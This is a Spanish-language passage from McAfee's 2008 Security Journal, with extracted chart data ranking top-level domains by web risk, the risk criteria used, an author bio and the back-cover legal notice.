electrnico comercial, afiliacin a otros sitios peligrosos, marketing agresivo a travs de ventanas emergentes o revisiones y comentarios de la comunidad de siteadvisor. cuanto ms alta es la cifra, mayor es el riesgo para los usuarios. adems de una cifra general, proporcionamos la variacin experimentada en cuanto al riesgo del ao anterior. el grfico de lneas muestra que en rumana el riesgo ha aumentado aproximadamente un 1 por ciento, mientras que en eslovaquia, por ejemplo, ha disminuido un 3 por ciento aproximadamente. los nmeros positivos indican un aumento del riesgo en comparacin con el ao anterior; los porcentajes negativos indican una disminucin del riesgo.
David Marcus es director de investigacin de seguridad y comunicaciones de Mcafee avert labs. contribuye a dar a conocer a los clientes de Mcafee y a la gran comunidad de expertos las numerosas novedades fruto de las investigaciones de seguridad de avert labs. en la actualidad, Marcus es responsable de relaciones pblicas, se encarga del contacto con los medios de comunicacin, mantiene su liderazgo intelectual, actuando como administrador del blog McAfee Avert Labs Security Blog. adems es presentador de AudioParasiticsEl podcast oficial de McAfee Avert Labs. Tambin dirige todas las publicaciones de avert labs, incluida la revista McAfee Security Journal.

NOTA
1 http://www.mcafee.com/us/security_insights/archived/june_2008/si_jun1_08.html

44

McaFee secUrITy JoUrnal

TLD clasificados de Europa, Oriente Medio y frica clasificados por riesgo general
8,0% 6,0% 4,0% 2,0% 0,0% -2,0% -4,0% Rumana .ro Portugal .pt Reino Unido .uk Irlanda .ie Dinamarca .dk Holanda .nl Yugoslavia .yu Noruega .no Austria .at Croacia .hr Grecia .gr Estonia .ee Surfrica .za Islandia .is Eslovenia .si Bulgaria .bg Unin Europea Alemania .de Hungra .hu Repblica Checa .cz Eslovaquia .sk Finlandia .fi Ucrania .ua Polonia .pl Turqua .tr Letonia .lv Blgica .be Lituania .lt Espaa .es Francia .fr Suecia .se Irn .ir Rusia .ru Suiza .ch Italia .it Israel .il
Variacin del riesgo entre 2007 y 2008 (en puntos) Riesgo general en 2008

TLD de Asia clasificados por riesgo general

20,0% 18,0% 16,0% 14,0% 12,0% 10,0% 8,0% 6,0% 4,0% 2,0% 0,0% -2,0% -4,0% -6,0% -8,0% -10,0% R.P de China .cn Islas Cocos (Keeling) .cc Corea del Sur .kr Tuvalu .tv Tonga .to Vietnam .vn Islas Navidad .cx R. de China (Taiwn) .tw Tokelau .tk Niue .nu Vanuatu .us Malasia .my Singapur .sg Australia .au Filipinas .ph Samona .ws Tailandia .th Indonesia .id Nueva Zelanda .nz Hong Kong .hk Japn .jp India .in
Variacin del riesgo entre 2007 y 2008 (en puntos) Riesgo general en 2008

TLD de Amrica clasificados por riesgo general

2,5% 2,0% 1,5% 1,0% 0,5% 0,0% -0,5% -1,0% -1,5% Argentina .ar Canad .ca Brasil .br Mjico .mx Chile .cl Venezuela .ve Estados Unidos .us Colombia .co
Variacin del riesgo entre 2007 y 2008 (en puntos) Riesgo general en 2008

Criterios de riesgo empleados para evaluar los TLD

Ataques a vulnerabilidades de navegadores

Adware/spyware/ troyanos/virus

Gran volumen de correo electrnico comercial

Asociaciones con otros sitios de riesgo

Marketing agresivo con ventanas emergentes

Revisiones/comentarios de la comunidad de SiteAdvisor

oToo 2008

45

10,0%

15,0%

20,0%

25,0%

-0,4% -5,0% 0,0% 0,0% 5,0% 0,2% 0,4% 0,6% 0,8% 1,0% 1,2%

-0,2%

-20,0%

-10,0%

10,0%

20,0%

30,0%

40,0%

50,0%

60,0%

70,0%

0,0%

20 TLD principales clasificados por riesgo de descarga

20 TLD principales clasificados por ataques (exploits)

TLP principales clasificados por prcticas de correo electrnico

46
Informacin .info R.P de China .cn Hong Kong .hk Redes .net Rusia .ru Corea del Sur .kr Empresas .biz R. de China (Taiwn) .tw Comercial .com Samoa .ws Yugoslavia .yu Ucrania .ua Tailandia .th Islas Cocos (Keeling) .cc Eslovaquia .sk Croacia .hr Unin Europea .eu Bulgaria .bg India .in Letonia .lv R.P de China .cn Italia .it Familias/Particulares .name Bulgaria .bg Blgica .be Islas Cocos (Keeling) .cc Tonga .to Tuvalu .tv Redes .net Comercial .com Estados Unidos .us Tokelau .tk Islas Navidad .cx Letonia .lv Israel .il Vietnam .vn Empresas .biz Samoa .ws Romania .ro Informacin .info
Riesgo general en 2008 Riesgo general en 2008 Riesgo general en 2008 Variacin del riesgo entre 2007 y 2008 (en puntos) Variacin del riesgo entre 2007 y 2008 (en puntos) Variacin del riesgo entre 2007 y 2008 (en puntos)

Rumana .ro

Informacin .info

Niue .nu

R.P de China .cn

McaFee secUrITy JoUrnal

Rusia .ru

Empresas .biz

Familias/Particulares .name

Islas Cocos (Keeling) .cc

Croacia .hr

Tonga .to

Ucrania .ua

Vietnam .vn

India .in

Redes .net

Portugal .pt

Samoa .ws

Polonia .pl

Estados Unidos .us

Comercial .com

Hong Kong .hk

oToo 2008

47

Mcafee, Inc. avenida de Bruselas n 22 edificio sauce 28108 alcobendas Madrid www.mcafee.com/es

Mcafee y/u otras marcas mencionadas en este documento son marcas comerciales registradas o marcas comerciales de Mcafee, Inc. y/o sus empresas filiales en ee. UU. y/u otros pases. el color rojo asociado a la seguridad es el distintivo de los productos de la marca Mcafee. Todas las dems marcas comerciales, tanto registradas como no registradas, mencionadas en este documento son propiedad exclusiva de sus propietarios respectivos. 2008 Mcafee, Inc. reservados todos los derechos.

48 McaFee 5001_sec-jrnl_fall08

secUrITy JoUrnal